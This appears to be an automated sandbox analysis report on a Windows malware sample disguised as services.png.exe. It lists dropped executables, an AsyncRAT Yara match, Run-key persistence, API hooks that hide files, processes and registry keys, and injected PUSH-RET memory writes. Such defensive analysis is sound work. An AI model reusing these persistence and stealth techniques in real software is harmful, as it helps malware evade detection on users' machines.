Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll

Source: C:\Windows\System32\sihost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41fd88f7-f295-4d39-91ac-a85f3149a05b}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wkernel32.pdb source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nel32.pdb source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .onel32.pdbUGP source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp

Source: UIServices[1].exe.1.dr

Static PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00421A5A LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00421A5A

Source: tmp3809.tmp.0.dr	Static PE information: section name: RT
Source: tmp3809.tmp.0.dr	Static PE information: section name: .mrdata
Source: tmp3809.tmp.0.dr	Static PE information: section name: .00cfg
Source: tmp3858.tmp.0.dr	Static PE information: section name: .didat
Source: smbhost[1].exe.1.dr	Static PE information: section name: .00cfg
Source: smbhost.exe.1.dr	Static PE information: section name: .00cfg
Source: tmp45F4.tmp.1.dr	Static PE information: section name: RT
Source: tmp45F4.tmp.1.dr	Static PE information: section name: .mrdata
Source: tmp45F4.tmp.1.dr	Static PE information: section name: .00cfg
Source: tmp4623.tmp.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00406834 pushfd ; retf	0_2_00406835
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00415114 push dword ptr [esp+edx-75h]; iretd	0_2_00415118
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00405B6A push edx; retf	0_2_00405B6B
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00407508 pushfd ; ret	0_2_0040750D
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02815B6A push edx; retf	0_2_02815B6B
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02816834 pushfd ; retf	0_2_02816835
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02825114 push dword ptr [esp+edx-75h]; iretd	0_2_02825118
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02817508 pushfd ; ret	0_2_0281750D
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00406834 pushfd ; retf	1_2_00406835
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00405B6A push edx; retf	1_2_00405B6B
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00407508 pushfd ; ret	1_2_0040750D
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD40E5ACDD push rcx; retf 003Fh	2_2_000001CD40E5ACDE
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438CC6DD push rcx; retf 003Fh	2_2_000001CD438CC6DE
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438FACDD push rcx; retf 003Fh	2_2_000001CD438FACDE
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A654ACDD push rcx; retf 003Fh	3_2_00000151A654ACDE
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A657C6DD push rcx; retf 003Fh	3_2_00000151A657C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29D077D4 push rsp; iretd	4_2_0000019E29D077E1
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29D0C6DD push rcx; retf 003Fh	4_2_0000019E29D0C6DE
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4CACDD push rcx; retf 003Fh	5_2_000001F28B4CACDE
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4FC6DD push rcx; retf 003Fh	5_2_000001F28B4FC6DE
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B52ACDD push rcx; retf 003Fh	5_2_000001F28B52ACDE
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B55C6DD push rcx; retf 003Fh	5_2_000001F28B55C6DE
Source: C:\Windows\explorer.exe	Code function: 6_2_08D4ACDD push rcx; retf 003Fh	6_2_08D4ACDE
Source: C:\Windows\explorer.exe	Code function: 6_2_0908C6DD push rcx; retf 003Fh	6_2_0908C6DE
Source: C:\Windows\explorer.exe	Code function: 6_2_093DACDD push rcx; retf 003Fh	6_2_093DACDE
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D594ACDD push rcx; retf 003Fh	7_2_00000221D594ACDE
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D597C6DD push rcx; retf 003Fh	7_2_00000221D597C6DE
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC6AC6DD push rcx; retf 003Fh	9_2_000001ECFC6AC6DE
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D17875C6DD push rcx; retf 003Fh	14_2_000001D17875C6DE
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787BC6DD push rcx; retf 003Fh	14_2_000001D1787BC6DE
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6121C6DD push rcx; retf 003Fh	17_2_0000023B6121C6DE

Source: services.png.exe	Static PE information: section name: .text entropy: 7.119341535145941
Source: nyheukpo.exe.0.dr	Static PE information: section name: .text entropy: 7.119341535145941
Source: tmp3809.tmp.0.dr	Static PE information: section name: .text entropy: 6.844715065913507
Source: tmp45F4.tmp.1.dr	Static PE information: section name: .text entropy: 6.844715065913507

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\services.png.exe	File created: C:\Users\user\AppData\Local\Temp\tmp3809.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\services.png.exe	File created: C:\Users\user\AppData\Local\Temp\tmp3858.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Temp\tmp4623.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\services.png.exe	File created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	File created: C:\Users\user\AppData\Local\Temp\tmp45F4.tmp	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Monitors registry run keys for changes

Source: C:\Windows\System32\ctfmon.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Qicoizh			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Qicoizh			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Overwrites Windows DLL code with PUSH RET codes

Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D8FF10 value: 68 B0 B4 42 00 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D6A810 value: 68 20 B5 42 00 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 76F03710 value: 68 37 A4 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 76EDDE80 value: 68 A3 A5 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74DF4100 value: 68 AE A8 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74DF3330 value: 68 33 A9 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75AA4190 value: 68 99 A9 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75A90560 value: 68 B0 A9 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D6EA60 value: 68 13 B9 83 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D758A0 value: 68 4B B9 83 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D6DFF0 value: 68 6C B9 83 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75A8EA50 value: 68 5D 12 82 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75A8E8E0 value: 68 9A 12 82 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75C0B390 value: 68 95 EE 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75C0B400 value: 68 C7 EE 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75BF7D00 value: 68 01 EF 81 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 75509390 value: 68 FE CD 83 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D8FF10 value: 68 B0 B4 83 02 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 74D6A810 value: 68 20 B5 83 02 C3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 1460 base: 74D8FF10 value: 68 B0 B4 42 00 C3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 1460 base: 74D6A810 value: 68 20 B5 42 00 C3	Jump to behavior
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 76F03710 value: 68 37 A4 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 76EDDE80 value: 68 A3 A5 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74DF4100 value: 68 AE A8 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74DF3330 value: 68 33 A9 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75AA4190 value: 68 99 A9 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75A90560 value: 68 B0 A9 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74D6EA60 value: 68 13 B9 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74D758A0 value: 68 4B B9 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74D6DFF0 value: 68 6C B9 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75A8EA50 value: 68 5D 12 9A 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75A8E8E0 value: 68 9A 12 9A 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75C0B390 value: 68 95 EE 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75C0B400 value: 68 C7 EE 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75BF7D00 value: 68 01 EF 99 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 75509390 value: 68 FE CD 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74D8FF10 value: 68 B0 B4 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 74D6A810 value: 68 20 B5 9B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 76F03710 value: 68 37 A4 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 76EDDE80 value: 68 A3 A5 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74DF4100 value: 68 AE A8 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74DF3330 value: 68 33 A9 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75AA4190 value: 68 99 A9 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75A90560 value: 68 B0 A9 E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74D6EA60 value: 68 13 B9 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74D758A0 value: 68 4B B9 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74D6DFF0 value: 68 6C B9 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75A8EA50 value: 68 5D 12 E4 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75A8E8E0 value: 68 9A 12 E4 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75C0B390 value: 68 95 EE E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75C0B400 value: 68 C7 EE E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75BF7D00 value: 68 01 EF E3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 75509390 value: 68 FE CD E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74D8FF10 value: 68 B0 B4 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 74D6A810 value: 68 20 B5 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 76F03710 value: 68 37 A4 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 76EDDE80 value: 68 A3 A5 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74DF4100 value: 68 AE A8 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74DF3330 value: 68 33 A9 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75AA4190 value: 68 99 A9 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75A90560 value: 68 B0 A9 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74D6EA60 value: 68 13 B9 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74D758A0 value: 68 4B B9 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74D6DFF0 value: 68 6C B9 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75A8EA50 value: 68 5D 12 54 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75A8E8E0 value: 68 9A 12 54 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75C0B390 value: 68 95 EE 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75C0B400 value: 68 C7 EE 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75BF7D00 value: 68 01 EF 53 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 75509390 value: 68 FE CD 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74D8FF10 value: 68 B0 B4 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 74D6A810 value: 68 20 B5 55 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 76F03710 value: 68 37 A4 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 76EDDE80 value: 68 A3 A5 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74DF4100 value: 68 AE A8 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74DF3330 value: 68 33 A9 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75AA4190 value: 68 99 A9 E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75A90560 value: 68 B0 A9 E5 02 C3
